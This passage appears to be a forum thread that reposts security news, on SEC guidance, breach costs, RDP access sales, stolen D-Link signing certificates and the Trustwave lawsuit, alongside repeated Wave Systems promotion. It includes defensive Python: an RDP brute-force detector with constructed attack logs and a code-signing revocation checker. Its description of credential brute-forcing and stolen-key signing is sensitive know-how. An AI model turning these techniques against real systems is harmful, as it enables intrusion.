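    if flags:
        return ("step-up", reasons)       # re-verify the user; flags also go to the SOC
    return ("allow", reasons)


# Constructed baseline and devices.
ALICE = UserBaseline("alice", frozenset({"GB"}), range(7, 20), frozenset({"lap-0042"}))
CORP_LAPTOP = Device("lap-0042", managed=True, attested_healthy=True, patch_age_days=3)
HOME_PC = Device("unknown-pc", managed=False, attested_healthy=False, patch_age_days=400)

if __name__ == "__main__":
    print(decide(Request("alice", CORP_LAPTOP, "finance-ledger", "GB", 10), ALICE))
    print(decide(Request("alice", HOME_PC, "wiki", "GB", 10), ALICE))
    print(decide(Request("alice", CORP_LAPTOP, "crm", "RO", 3), ALICE))
```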
SEC Cybersecurity Update May Lead to Increased Oversight
https://www.infosecurity-magazine.com/opinions/sec-update-increased-oversight/
In direct response to an unprecedented streak of massive data breaches and security incidents, the SEC recently released a statement and guidance on public company cybersecurity disclosures. The SEC's guidance has two major focuses: the importance of cybersecurity policies and procedures and the application of insider trading prohibitions in the cybersecurity context.
While signals are mixed, the SEC appears to view cybersecurity policy and practice as central to protecting markets. To quote from the SEC's February statement: “Today, the importance of data management and technology to business is analogous to the importance of electricity and other forms of power in the past century.”
Prognosis
To be clear, the updated guidance is not a formal regulation, so companies may choose to review and fix policy management issues — or they may ignore it altogether. Savvy corporate information security executives will internalize that this pointed focus on cybersecurity means increased oversight is soon to follow. We see this guidance as a precursor to regulations that could grow into a regime on par with SOX.
This prediction is supported by a few key factors:
Precedent — The New York State Department of Financial Services, 23 NYCRR 500, Cybersecurity Requirements for Financial Services Companies. See also state-level notification laws and the EU’s GDPR.
Avalanche — Financial sector breaches have tripled in five years.
Driver — Investors are seeking risk awareness to ensure they have all the facts for prudent investments.
Most experts and market watchers are discussing the SEC guidance in terms of how public companies will and should react to it. The untold story is that the guidance is likely a precursor to increased oversight. We’ve seen it happen in other sectors with governing bodies, such as in financial services with the FFIEC.
The SEC’s renewed focus on cybersecurity and data breaches is a good news/bad news scenario for CISOs. CISOs can leverage the gravity of SEC oversight into increased visibility and authority in the boardroom, as CEOs and CFOs now have greater risk management responsibility and accountability to investors. On the other hand, CISOs also now face heightened scrutiny and greater accountability, including the potential for more significant personal penalties.
Questions and Concerns
Most public companies are already straining under the weight of regulatory burdens and have invested heavily in their cybersecurity defenses. What more can they do?
The SEC guidance can be seen as a response to, and hedge against, the negative impact of massive breaches on public trust – already at a remarkably low point. Headline-worthy breaches keep happening. The full fallout from the Equifax disaster may still be coming. Target still finds itself getting press five years after its data breach.
While public companies have less and less say over what they disclose, it is important to examine the trust issue from a strategic standpoint: What effect will more disclosures have? What will happen to companies that fail to disclose in a timely and transparent manner? The SEC has already provided one answer, in the form of a $35 million penalty against Altaba (Yahoo) for failing to disclose a massive breach in 2014.
Urging public companies to do a better job of incident response, through integrated policies, procedures, controls, and collaboration, in the event of a breach or cyber-attack is only one part of the guidance.
Another major area of focus is risk management — the SEC emphasizes that investors have a right to be notified of major risk factors, even before a negative event occurs. This means public companies, which often leverage complex global supply chains, will likely need to improve their enterprise risk management programs to gain the visibility and agility required to achieve a proactive state.
Answers and Insights
The next step is to integrate all the components — cybersecurity, data privacy, data integrity, compliance, audit, business resiliency and third-party management — merging and managing them through an integrated risk management program and solution.
These technology platforms support risk management effectiveness and policy management best practices, a core aspect of the SEC update. Organizations with solid integrated risk management programs are able to leverage their visibility into various components (vendor risk, audits, etc.) to make IT risk management more effective and actionable.
By systematically linking policies to controls, it becomes easier to prove compliance and diligence. The linkages provide a defensible record, essential to withstanding public scrutiny and investigations. Everything can be documented, from the publication and distribution of policies to training and testing, and then investigation, corrective actions, and follow-up reports.
Moreover, policies managed through integrated risk management solutions can be created and updated efficiently in response to business or regulatory changes.
A quick scan of the SEC guidance (and most other cybersecurity directives) reveals a daunting number of details and convoluted processes that need to be addressed. That’s why automation is so vital to achieve excellence in risk management.
Streamlining workflows, centralizing documentation, freeing data from silos, and systematizing processes — all these capabilities save time and money, but they also increase visibility across the enterprise, enable collaboration, and bridge vulnerable gaps.
In the end, the issues raised by the SEC’s updated guidance are important for every organization. Cultivating corporate responsibility, sustaining consumer trust, protecting valuable data assets, and maintaining the integrity of critical ecosystems are all essential to long-term success and competitive advantage.
Digging deep to identify vulnerabilities, track improvements and outcomes, and ensure accountability will create a stronger, more resilient organization.
IBM: A data breach will now cost your organization $3.86 million, if you're lucky
See wavesys.com on how to use better cybersecurity and prevent potential enormous future breach costs. imo.
https://www.zdnet.com/article/ibm-a-data-breach-will-now-cost-your-organization-3-86-million/
There are hidden costs over time which make the bill far larger than you may expect.
A new global study conducted by IBM suggests the financial impact of a data breach for an organization is, on average, $3.86 million.
However, in the worst cases, "mega breaches" may cost the enterprise between $40 million and $350 million.
IBM's 2018 Cost of a Data Breach Study, conducted in conjunction with the Ponemon Institute, suggests that the cost can become this high not due to the obvious damage caused by systems -- or the theft of information at the time of a breach -- but rather due to more subtle expenses incurred by an organization.
A loss of reputation may deter potential future customers, current business relationships may falter, and the time employees must spend on damage control -- as well as retraining and education -- may all rack up the bill.
According to the study, the average cost of a data breach, $3.86 million, has increased by 6.4 percent from 2017.
After interviewing close to 500 companies which have experienced a data breach, the study calculated that this is the average cost when under 100,000 records are compromised in a cybersecurity incident.
The average time it took to uncover a data breach is 197 days, and once identified, it takes roughly 69 days to contain.
However, the speed of incident response teams can have a huge impact on the overall cost of a data breach.
When a breach is contained in less than a month, IBM suggests businesses may be able to save up to $1 million in comparison to slower companies.
The amount of records stolen also has an effect. On average, each record costs $148, but this cost can be mitigated by having an incident response team on hand, as well as by implementing artificial intelligence (AI)-based cybersecurity solutions.
"Organizations that had extensively deployed automated security technologies saved over $1.5 million on the total cost of a breach," IBM says.
The study has also examined the cost of so-called "mega breaches," in which cyberattacks result in the loss of one million to 50 million records. In these cases, enterprise players can expect to lose between $40 million and $350 million -- but one-third of this estimated cost is caused by lost business.
A recent IBM/Harris poll suggested that 75 percent of US consumers would not do business with a company they did not believe would take adequate measures to protect their data. When you consider that this aversion may be for years -- or permanent -- the true cost of data breaches to an organization may be incalculable.
Based on 11 companies experiencing this level of a data breach in the past two years -- such as Equifax and Target -- the study suggests that the majority of these security incidents are malicious rather than caused by human error, and the average time to detect and contain a breach was 365 days.
"While highly publicized data breaches often report losses in the millions, these numbers are highly variable and often focused on a few specific costs which are easily quantified," said Wendi Whitmore, Global Lead for IBM X-Force Incident Response and Intelligence Services (IRIS). "The truth is there are many hidden expenses which must be taken into account such as reputational damage, customer turnover, and operational costs."
"Knowing where the costs lie, and how to reduce them, can help companies invest their resources more strategically and lower the huge financial risks at stake," the executive added.
Hackers dangle a wide variety of phishing hooks beyond email
Wave VSC 2.0 could help protect companies' computers in the face of the phishing that is presented in this article.
https://www.wavesys.com/products/wave-virtual-smart-card
https://www.itproportal.com/features/hackers-dangle-a-wide-variety-of-phishing-hooks-beyond-email/
Browsers and browser users are the new OS that need increased protection in order to stop phishing that leads to breaches and other damage
A recent report from Barracuda Networks found that 87 per cent of respondents faced an attempted email-based phishing attack in the past year, making it clear that email-based phishing continues to be a major threat vector. But what happens when improved security defences and employee awareness training make email phishing threats less likely to succeed? Well, if nothing else, hackers are smart and resourceful. They just change to phishing tactics beyond email.
Today, most security teams are finally becoming more aware of the large and growing threat of sophisticated phishing attacks that tempt employees outside of email. This new and fast-evolving attack vector targets users with increasingly sophisticated phishing attacks delivered via ads, search results, pop-ups, browser extensions, social media, chat applications, “free” web apps, and more.
Such sneaky socially engineered attacks often appear in an “arena of trust,” like a legitimate website or social media application. They deceive employees into offering up personal credentials or visiting malicious web pages that compromise their browsers and do keylogging and other malevolent actions that are hard for traditional security solutions to detect.
Hackers are preying on human fallibility with HTML-based attacks that evade existing defences by design. Disguised as legitimate web traffic, they slip through firewalls and secure web gateways. And with these new phishing campaigns typically lasting just hours, existing threat-based defences can’t keep up with fast-moving attacks. In essence, browsers and browser users are the new OS that need increased protection in order to stop phishing that leads to breaches and other damage.
New types of phishing attacks are on the rise
The growing use of the Web, SaaS applications, social media, and other Internet-based resources for daily tasks is making it an increasingly appealing attack vector for hackers. While employees are on the Web or using social media, they are vulnerable to a growing variety of complex phishing attacks outside of their inbox. And with devices such as laptops and phones increasingly being dual use devices, used for both business and personal use, compromises that take place during personal time can compromise a device and help hackers gain entry into corporate networks.
Here is a brief roundup of the most common types of phishing attacks beyond email on the rise today, and why organisations should be on the alert.
Fake logins and credential stealing
It starts out looking real enough. You search for a login page for your Facebook, Google, or Dropbox account at work and come across what appears to be a legitimate page, so you enter your credentials into the phony login. This mistake makes you fair game for attackers to steal your info and get access to your critical files and passwords, and possibly even infiltrate the larger corporate network.
In the example below, attackers provide a custom Dropbox phishing page that allows users to gain access through the trusted email login source of their choice. Regardless of the selection, once the user enters his or her credentials in any of the above logins, the form will submit the stolen information through a php script of the same name as the popup htm. In each php, the attacker has written code to send the collected information to this email address.
Malicious browser extensions and ads
According to a recent report, Google says it removed 3.2 billion ads from its platforms in 2017, nearly double the total number of “bad ads” from just a year earlier. That equates to removing about 100 ads per second.
Google also reported that cybercriminals infected more than 100,000 computers with browser extensions that stole login credentials, mined cryptocurrencies, and engaged in click fraud. The malicious extensions were hosted in Google’s official Chrome Web Store. These browser extensions and related HTML malware are often promoted via ads, search engines, and social media to trick users through increasingly sophisticated and trustworthy social engineering methods.
rest at link -
Hackers can purchase government login credentials for cheap on the dark web
https://www.wavesys.com/products/wave-virtual-smart-card
Excerpt:
What can it be used for?
What do you use your smart card for today? With the exception of keying open the door at work, Wave Virtual Smart Card can perform any of the services or applications you rely on your smart card for today. Secure VPN, WiFi, remote desktop, cloud applications – it can all be done with a virtual smart card.
https://www.digitaltrends.com/computing/mcafee-hackers-buy-remote-desktop-access-dark-web/
McAfee’s Advanced Threat Research team recently discovered that hackers have access to many organizations that have weak credentials when using Microsoft’s Remote Desktop component in Windows-based systems. Access to these organizations — whether it’s an airport, a hospital or the U.S. government — can be bought for little money through specific shops on the dark web.
Microsoft’s Remote Desktop Protocol (RDP) essentially allows you to connect and use a Windows-based PC from a remote location. When those login credentials are weak, hackers can use brute force attacks to gain the username and password for each connection. McAfee found connections up for sale across various RDP shops on the dark web ranging between a mere 15 to a staggering 40,000 connections.
“The advertised systems ranged from Windows XP through Windows 10,” says John Fokker, McAfee’s Head of Cyber Investigations. “Windows 2008 and 2012 Server were the most abundant systems, with around 11,000 and 6,500, respectively, for sale. Prices ranged from around $3 for a simple configuration to $19 for a high-bandwidth system that offered access with administrator rights.”
Among the list of devices, services and networks on the menu are multiple government systems on sale worldwide, including those linked to the United States. The team found connections to a variety of healthcare institutions including medical equipment shops, hospitals, and more. They even found access to security and building automation systems at a major international airport selling for a mere $10.
The problem doesn’t just revolve around desktops, laptops, and servers. Internet of Things devices based on Windows Embedded are also on the menu such as point-of-sale systems, kiosks, parking meters, thin client PCs and more. Many are overlooked and not updated, making them a quiet entryway for hackers.
Black market sellers gain RDP credentials by scanning the internet for systems that accept RDP connections, and then use tools like Hydra, NLBrute and RDP Forcer to attack the login using stolen credentials and password dictionaries. Once they successfully log into the remote PC, they don’t do anything but put the connection details up for sale.
After hackers pay for a connection, they can bring a corporation down to its knees. For instance, a hacker could pay a mere $10 for a connection, infiltrate the network to encrypt the files of every PC, and demand a $40,000 ransom. Compromised PCs can also be used to deliver spam, misdirect illegal activity and mine cryptocurrency. Access is also good for stealing personal information and company trade secrets.
“We found a newly posted Windows Server 2008 R2 Standard machine on the UAS Shop,” Fokker writes. “According to the shop details, it belonged to a city in the United States and for a mere $10 we could get administrator rights to this system. UAS Shop hides the last two octets of the IP addresses of the systems it offers for sale and charges a small fee for the complete address.”
The solution, according to McAfee, is that organizations need to do a better job at checking all their virtual “doors and windows” so hackers can’t sneak in. Remote access should be secure and not easily exploitable.
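Checking the "doors and windows" McAfee refers to starts with noticing the password-guessing that fills these shops. The following is an added example, not McAfee's code: a detector for an RDP brute-force burst followed by a successful logon, run over constructed Windows Security log lines (Event ID 4625 = failed logon, 4624 = successful logon, LogonType 10 = RemoteInteractive, i.e. RDP). The line format is a simplified key=value rendering of those events, assumed for the example.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed log format: one event per line, key=value fields.
LINE_RE = re.compile(
    r"^(?P<ts>\S+) EventID=(?P<eid>\d+) LogonType=(?P<lt>\d+) "
    r"Account=(?P<acct>\S+) Source=(?P<src>\S+)$"
)


def parse(line: str):
    """Parse one constructed log line; return None for lines that do not match."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    return {
        "ts": datetime.strptime(m["ts"], "%Y-%m-%dT%H:%M:%SZ"),
        "eid": int(m["eid"]),
        "lt": int(m["lt"]),
        "acct": m["acct"],
        "src": m["src"],
    }


def detect_rdp_bruteforce(lines, threshold=5, window=timedelta(minutes=5)):
    """Return alert strings.

    BRUTE_FORCE: `threshold` or more RDP logon failures from one source within `window`.
    LIKELY_COMPROMISE: an RDP logon success from a flagged source inside the window,
    which is the moment a sold credential (or a lucky guess) starts being used.
    """
    failures = defaultdict(deque)   # source -> (timestamp, account) of recent failures
    flagged = {}                    # source -> time the brute-force alert fired
    alerts = []
    for line in lines:
        ev = parse(line)
        if ev is None or ev["lt"] != 10:   # only RemoteInteractive (RDP) logons
            continue
        q = failures[ev["src"]]
        if ev["eid"] == 4625:
            q.append((ev["ts"], ev["acct"]))
            while q and ev["ts"] - q[0][0] > window:
                q.popleft()            # slide the window
            if len(q) >= threshold and ev["src"] not in flagged:
                accounts = sorted({a for _, a in q})
                alerts.append(f"BRUTE_FORCE src={ev['src']} failures={len(q)} accounts={accounts}")
                flagged[ev["src"]] = ev["ts"]
        elif ev["eid"] == 4624:
            fired = flagged.get(ev["src"])
            if fired is not None and ev["ts"] - fired <= window:
                alerts.append(f"LIKELY_COMPROMISE src={ev['src']} account={ev['acct']} after brute force")
    return alerts


# Constructed sample: a guessing burst from 203.0.113.7, two stray failures from
# 198.51.100.4, and a normal interactive (non-RDP) logon that must be ignored.
SAMPLE_LOG = """
2018-07-10T02:14:05Z EventID=4625 LogonType=10 Account=administrator Source=203.0.113.7
2018-07-10T02:14:09Z EventID=4625 LogonType=10 Account=admin Source=203.0.113.7
2018-07-10T02:14:13Z EventID=4625 LogonType=10 Account=administrator Source=203.0.113.7
2018-07-10T02:14:18Z EventID=4625 LogonType=10 Account=backup Source=203.0.113.7
2018-07-10T02:14:20Z EventID=4625 LogonType=10 Account=jsmith Source=198.51.100.4
2018-07-10T02:14:22Z EventID=4625 LogonType=10 Account=admin Source=203.0.113.7
2018-07-10T02:14:27Z EventID=4625 LogonType=10 Account=backup Source=203.0.113.7
2018-07-10T02:14:40Z EventID=4624 LogonType=2 Account=jsmith Source=198.51.100.4
2018-07-10T02:15:40Z EventID=4624 LogonType=10 Account=backup Source=203.0.113.7
""".strip().splitlines()

if __name__ == "__main__":
    for alert in detect_rdp_bruteforce(SAMPLE_LOG):
        print(alert)
```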
Stolen certificates from D-Link used to sign password-stealing malware
Wave VSC 2.0 - https://www.wavesys.com/products/wave-virtual-smart-card
Wave Endpoint Monitor - https://www.wavesys.com/malware-protection
https://arstechnica.com/information-technology/2018/07/stolen-certificates-from-d-link-used-to-sign-password-stealing-malware/
This isn't the IP camera software you think it is.
Criminals recently stole code-signing certificates from router and camera maker D-Link and another Taiwanese company and used them to pass off malware that steals passwords and backdoors PCs, a researcher said Monday.
The certificates were used to cryptographically verify that legitimate software was issued by D-Link and Changing Information Technology. Microsoft Windows, Apple’s macOS, and most other operating systems rely on the cryptographic signatures produced by such certificates to help users ensure that executable files attached to emails or downloaded on websites were developed by trusted companies rather than malicious actors masquerading as those trusted companies.
Somehow, members of an advanced persistent-threat hacking group known as BlackTech obtained the certificates belonging to D-Link and Changing Information Technology, the researcher with antivirus provider Eset said in a blog post. The attackers then used the certificates to sign two pieces of malware, one a remotely controlled backdoor and the other a related password stealer. Both pieces of malware are referred to as Plead and are used in espionage campaigns against targets located in East Asia. The Japan Computer Emergency Response team recently documented the Plead malware here. AV provider Trend Micro recently wrote about BlackTech here.
“The ability to compromise several Taiwan-based technology companies and reuse their code-signing certificates in future attacks shows that this group is highly skilled and focused on that region,” Eset researcher Anton Cherepanov wrote in Monday’s post.
Don’t try this at home
In a support announcement, D-Link officials said that two separate code-signing certificates were recently misappropriated by a “highly active cyber espionage group.” The post said most D-Link customers won’t be affected by the theft, but it also suggested some people may experience errors when viewing mydlink IP cameras within Web browsers. Company engineers are in the process of releasing updated firmware to fix the errors. People using mydlink mobile applications aren’t affected.
Both D-Link and Changing Information Technology have revoked the stolen certificates. Until the D-Link firmware is issued, the company’s support announcement is advising people who want to use browsers to view their affected D-Link cameras to temporarily ignore the certificate revocation warnings. This is bad advice that could be abused by malware operators. Users should disregard it.
The best-known example of malware that abused stolen code-signing certificates was the Stuxnet worm that targeted Iran’s nuclear enrichment program almost a decade ago. The malware used legitimate certificates belonging to RealTek and JMicron which are both, like D-Link and Changing Information Technology, known technology companies based in Taiwan.
Last year, researchers published research that showed that malware signed by OS-trusted code-signing certificates was more common than most people assumed, with the first known instance occurring in 2003. Earlier this year, researchers documented several underground services that sold counterfeit signing credentials that are unique to each buyer. The thefts reported Monday are an indication that misappropriated certificates remain a widely used technique for concealing malicious software.
Stolen Taiwanese Certs Used in Malware Campaign
https://www.infosecurity-magazine.com/news/stolen-taiwanese-certs-used/?utm_source=dlvr.it&utm_medium=twitter
Security researchers have discovered yet another cyber-attack campaign using stolen certificates to circumvent traditional security tools.
The tactic was being used to launch a remotely controlled backdoor dubbed Plead and a related password stealer, according to Eset senior malware researcher, Anton Cherepanov.
Plead was spotted last year being used by a group known as BlackTech to compromise targets in East Asia including Hong Kong, Japan and Taiwan, and as such could be a Beijing-backed venture.
Two certificates were used to sign the malware, one belonging to Taiwanese security company Changing Information Technology and another issued by D-Link.
“We spotted this malware campaign when our systems marked several files as suspicious. Interestingly, the flagged files were digitally signed using a valid D-Link Corporation code-signing certificate. The exact same certificate had been used to sign non-malicious D-Link software; therefore, the certificate was likely stolen,” explained Cherepanov.
After being notified of the discovery, D-Link revoked the certificate last week, he added.
However, BlackTech is still using the Changing Information Technology certificate, despite it also having been revoked last week.
Kevin Bocek, chief cybersecurity officer at Venafi, pointed out that the use of stolen certificates is not new and was in fact popularized by the Stuxnet authors.
“If you steal trusted machine identities from global technology companies, you can execute highly effective attacks that don’t raise any alarms. This is just one more demonstration of how machine identities, in this case code signing certificates, are being abused by malicious actors. There’s no doubt we’re going to see a lot more of these attacks in the future,” he added.
“Code-signing certificates are often a core component of DevOps and cloud infrastructure; and because organizations are using a lot more machine identities, these risks will only grow. In fact, researchers are already seeing a dramatic rise in the trade of stolen code-signing certificates on the dark web.”
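Both articles above (the Ars Technica and Infosecurity pieces) turn on the same mechanism: a signature made with a stolen but genuine certificate verifies perfectly, and only the issuer's revocation list separates it from legitimate software. As an added example (my own code, not D-Link's, Eset's or any operating system's verifier), here is a miniature code-signing check built with Python's `cryptography` library; the CA, vendor certificate, payload and CRL are all constructed in memory, and the `enforce_revocation` flag shows what the support advice to ignore revocation warnings amounts to.

```python
"""Miniature code-signing verifier that honours certificate revocation.

Requires the third-party `cryptography` package. Everything here is
constructed: an example CA, a vendor signing certificate, a payload
standing in for a signed executable, and the CA's CRL.
"""
import datetime
from cryptography import x509
from cryptography.x509.oid import NameOID, ExtendedKeyUsageOID
from cryptography.hazmat.primitives import hashes
from cryptography.hazmat.primitives.asymmetric import ec
from cryptography.exceptions import InvalidSignature

NOW = datetime.datetime(2018, 7, 10, tzinfo=datetime.timezone.utc)


def _name(cn):
    return x509.Name([x509.NameAttribute(NameOID.COMMON_NAME, cn)])


def make_ca():
    """Self-signed example CA (constructed; stands in for a public CA)."""
    key = ec.generate_private_key(ec.SECP256R1())
    cert = (x509.CertificateBuilder()
            .subject_name(_name("Example Code Signing CA"))
            .issuer_name(_name("Example Code Signing CA"))
            .public_key(key.public_key())
            .serial_number(x509.random_serial_number())
            .not_valid_before(NOW - datetime.timedelta(days=1))
            .not_valid_after(NOW + datetime.timedelta(days=3650))
            .add_extension(x509.BasicConstraints(ca=True, path_length=None), critical=True)
            .sign(key, hashes.SHA256()))
    return key, cert


def issue_signer(ca_key, ca_cert, cn):
    """Code-signing certificate issued by the CA, as a vendor would hold."""
    key = ec.generate_private_key(ec.SECP256R1())
    cert = (x509.CertificateBuilder()
            .subject_name(_name(cn))
            .issuer_name(ca_cert.subject)
            .public_key(key.public_key())
            .serial_number(x509.random_serial_number())
            .not_valid_before(NOW - datetime.timedelta(days=1))
            .not_valid_after(NOW + datetime.timedelta(days=365))
            .add_extension(x509.ExtendedKeyUsage([ExtendedKeyUsageOID.CODE_SIGNING]), critical=False)
            .sign(ca_key, hashes.SHA256()))
    return key, cert


def sign_file(signer_key, data):
    """Whoever holds the private key can produce a valid signature."""
    return signer_key.sign(data, ec.ECDSA(hashes.SHA256()))


def build_crl(ca_key, ca_cert, revoked_certs):
    """CA-signed revocation list naming the given certificates."""
    builder = (x509.CertificateRevocationListBuilder()
               .issuer_name(ca_cert.subject)
               .last_update(NOW)
               .next_update(NOW + datetime.timedelta(days=7)))
    for cert in revoked_certs:
        entry = (x509.RevokedCertificateBuilder()
                 .serial_number(cert.serial_number)
                 .revocation_date(NOW)
                 .build())
        builder = builder.add_revoked_certificate(entry)
    return builder.sign(ca_key, hashes.SHA256())


def verify_signed_file(data, signature, signer_cert, ca_cert, crl, enforce_revocation=True):
    """Return "valid", "bad-signature", "untrusted-issuer" or "revoked"."""
    # 1. The signer certificate must have been issued by the trusted CA.
    try:
        ca_cert.public_key().verify(signer_cert.signature, signer_cert.tbs_certificate_bytes,
                                    ec.ECDSA(signer_cert.signature_hash_algorithm))
    except InvalidSignature:
        return "untrusted-issuer"
    # 2. The file signature must verify under the signer's public key.
    try:
        signer_cert.public_key().verify(signature, data, ec.ECDSA(hashes.SHA256()))
    except InvalidSignature:
        return "bad-signature"
    # 3. The CRL must be genuine and must not list the signer's serial.
    if enforce_revocation:
        if not crl.is_signature_valid(ca_cert.public_key()):
            return "untrusted-issuer"
        if crl.get_revoked_certificate_by_serial_number(signer_cert.serial_number) is not None:
            return "revoked"
    return "valid"


def demo():
    """Stolen-key scenario: before revocation, after revocation, and with revocation ignored."""
    ca_key, ca_cert = make_ca()
    signer_key, signer_cert = issue_signer(ca_key, ca_cert, "Example Vendor Co.")
    payload = b"constructed payload signed with a stolen key"  # stands in for the malware
    sig = sign_file(signer_key, payload)
    before = verify_signed_file(payload, sig, signer_cert, ca_cert, build_crl(ca_key, ca_cert, []))
    crl = build_crl(ca_key, ca_cert, [signer_cert])  # vendor revokes the stolen certificate
    after = verify_signed_file(payload, sig, signer_cert, ca_cert, crl)
    ignored = verify_signed_file(payload, sig, signer_cert, ca_cert, crl, enforce_revocation=False)
    return before, after, ignored


if __name__ == "__main__":
    print(demo())  # ('valid', 'revoked', 'valid')
```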
Security Firm Sued for Failing to Detect Malware That Caused a 2009 Breach
If the cyber-insurance companies (e.g. AXA) properly incentivized businesses to use superior cybersecurity with companies such as Wave Systems (wavesys.com), these types of lawsuits mentioned in the article could be avoided. imo.
https://www.bleepingcomputer.com/news/security/security-firm-sued-for-failing-to-detect-malware-that-caused-a-2009-breach/
Two insurance companies are suing a cyber-security firm to recover insurance fees paid to a customer after the security firm failed to detect malware on the client's network for months, an issue that led to one of the biggest security breaches of the 2000s. The security firm says the lawsuit is meritless.
The two insurance firms are Lexington Insurance Company and Beazley Insurance Company, and both insured Heartland Payment Systems, a leading payment processing company.
Lawsuit related to 2009 Heartland mega breach
In January 2009, Heartland announced a major security breach of its network, following which an attacker stole details for over 100 million payment cards stored on its systems by over 650 of Heartland's customers.
Following this devastating hack and one of the biggest of the 2000s, Heartland paid over $148 million in settlement fees for various lawsuits, and other remediation costs and expenses Heartland owed its customers.
As part of their insurance agreements, the two firms paid $30 million to Heartland in the hack's aftermath, with the Lexington Insurance Company footing a $20 million bill, and the Beazley Insurance Company paying another $10 million.
Lawsuit claims Trustwave failed to detect intrusion
But now, according to a civil lawsuit filed on June 28 in Illinois, and first reported by the Cook County Record, the two companies are trying to recover those costs, and are claiming that the security firm with which Heartland had a service contract had failed to honor its agreement.
The two insurance firms claim that Chicago-based Trustwave Holdings, Inc. — the security firm — had failed to detect that an attacker used an SQL injection attack to breach Heartland's systems on July 24, 2007.
Furthermore, the two say Trustwave also failed to detect that attackers installed malware on the payments processor's servers on May 14, 2008, and did not raise a sign of alarm about the event.
The lawsuit points out that Trustwave did not detect any signs of suspicious activity during its security audits it provided Heartland for almost two years as part of its contracts, which also included testing for PCI DSS compliance and attestation.
Visa report suggests Trustwave's fault
The lawsuit also mentions that in the aftermath of the hack, Visa conducted a review of Heartland's servers and found that Trustwave incorrectly certified Heartland as PCI DSS compliant. PCI DSS stands for Payment Card Industry Data Security Standard, an attestation every vendor must obtain before being allowed to handle credit card data.
The lawsuit claims that Visa discovered that Trustwave ignored the fact that Heartland didn't run a firewall, was using vendor-supplied passwords, didn't have sufficient protection for the storage system used for card data, failed to assign unique identification to each person accessing its system, and had failed to monitor servers and cardholder data at regular intervals.
All of these are PCI DSS compliance rules, and Visa said that despite all the problems on Heartland's network, Trustwave provided PCI DSS attestation. Visa later prohibited Heartland from employing Trustwave following the wrongful attestation.
Citing the Visa report and other post-breach documents, the two insurance firms claim that Trustwave is guilty of gross negligence. Furthermore, the lawsuit claims that Trustwave is also in breach of the contracts it signed with Heartland, for which it was supposed to provide security services. The two insurance firms are now asking for damages of at least $30 million, pending a jury trial, following Trustwave's failure to detect the intrusion.
Trustwave denies fault, says it's an old story
But in a statement to Bleeping Computer, Trustwave says the lawsuit is meritless.
"Trustwave filed a lawsuit in Delaware against insurers Lexington and Beazley in response to their time-barred and unwarranted attempt to recoup the insurance payments they made as coverage for a 2008 data breach at Heartland," a Trustwave spokesperson told us. "The insurers subsequently filed a duplicative suit in Illinois regarding the exact same matter."
"Trustwave provided Heartland with an assessment of its compliance with PCI DSS. However, such an assessment, as the contract at issue makes clear, in no way guarantees that the company examined has not or cannot be breached," the spokesperson added.
"Trustwave did not manage Heartland's information security, and at no time did Heartland assign blame for the breach or make any claim against Trustwave. The insurers' demand related to a decade-old breach is entirely without merit. Trustwave initiated the lawsuit in order to obtain a resolution of these baseless demands and intends to pursue this matter vigorously."
Trustwave was sued before in similar cases
This is the third time Trustwave is on the receiving end of such a lawsuit. A banking conglomerate sued Trustwave in 2014 for its role in the Target breach, but the lawsuit was dropped after a few days when it was discovered that Trustwave was not responsible for securing Target's payment card data, and hence, not at fault.
Trustwave was sued for a second time in 2016 when a casino operator claimed the security firm failed to contain and eradicate a 2013 breach of its payment system. The lawsuit claims Trustwave missed a second breach that later allowed a crook to steal over 300,000 payment card details from the casino operator's customers. This lawsuit is ongoing.
Senate Panel Announces Hearing on Computer Chip Flaws
Why not use the TPM to store sensitive data instead of having to continuously PATCH for Spectre and Meltdown? That method doesn't seem to be working and getting all new processors would take years to be absorbed into the market.
http://thehill.com/policy/cybersecurity/395878-senate-panel-announces-hearing-on-computer-chip-flaws
Netflix's Latest Price Test Could Be Bad News for Password Sharers
Wavexpress (Wave subsidiary) has closed up shop for quite some time but it is still an interesting technology in that the TPM could be a good device identifier for Netflix. imo. Steve Sprague years ago had indicated that cable was no longer being stolen due to hardware security. Maybe Netflix could license some of Wavexpress's technology given their new testing indicated in the article below.
https://www.thestreet.com/opinion/netflix-price-test-could-be-bad-news-for-password-sharers-14642914
The streaming giant is testing a pricing overhaul that would lower the number of simultaneous streams that are supported by two of its plans. That could give a lift to subscriptions and average prices.
It's an open secret that many Netflix subscribers "share" their login credentials with friends and/or relatives.
If recent European tests are any sign, the streaming giant is finally thinking about cutting down on the behavior, by lowering the number of simultaneous streams supported by what are currently its two most expensive plans. And though such a move naturally risks sparking a consumer backlash, it could also provide a lift to Netflix's subscriber growth and average selling prices (ASPs) in the U.S. and some other developed markets.
Earlier this week, CordCutting.com and Italian site TuttoAndroid reported that Netflix is testing a pricing overhaul in European markets in which the company would launch an "Ultra" subscription plan that has the features of its current Premium plan, which costs €14 ($16.35) per month in a slew of European markets and $14 per month in the U.S. Like the current Premium plan, the Ultra plan lets accounts play up to four streams at the same time in either HD or (if a particular show or movie supports it) 4K resolution.
Notably, the Ultra plan is priced at €17 ($19.86) per month in the test. The Premium plan is still being offered, but only supports two simultaneous streams instead of the four that Premium subs currently enjoy. And Netflix's popular Standard plan -- which costs €11 ($12.85) or $11 per month in the U.S. and supports HD (but not 4K) streaming -- only supports one stream in the test, rather than the current two.
Users seeing the test aren't witnessing any changes to Netflix's Basic plan: It still costs €8 ($9.34) per month in Europe and $7.99 in the U.S. and supports one standard-definition stream.
A Netflix spokeswoman confirmed the test to CNET. "In this case, we are testing slightly different price points and features to better understand how consumers value Netflix," she said.
Clearly, if Netflix rolled out the pricing revamp on a large scale, Standard and (to some extent) Premium subs who are sharing their login credentials with other households would need to either think twice about doing so, or upgrade to a more expensive plan. And judging by both surveys and anecdotal evidence, the number of Netflix subs faced with that dilemma could be meaningful.
Last year, a U.S. Reuters survey found that 12% of adult streaming viewers admitted to "using an account/log-in information that belongs to someone outside your house." Among consumers aged 18 to 24, the figure rose to 21%. Assuming that some consumers were embarrassed to admit to such activity, Reuters's survey numbers might slightly understate how prevalent it is.
To date, Netflix has avoided cracking down on password-sharing, arguing that doing so risks snaring consumers engaged in "legitimate" sharing (for example, subscribers who share their log-ins with spouses or children). Lowering the number of streams supported by the Standard and Premium plans, though, would let the company reduce how much password-sharing occurs without engaging in a case-by-case crackdown that upsets "legitimate" sharers caught up in it.
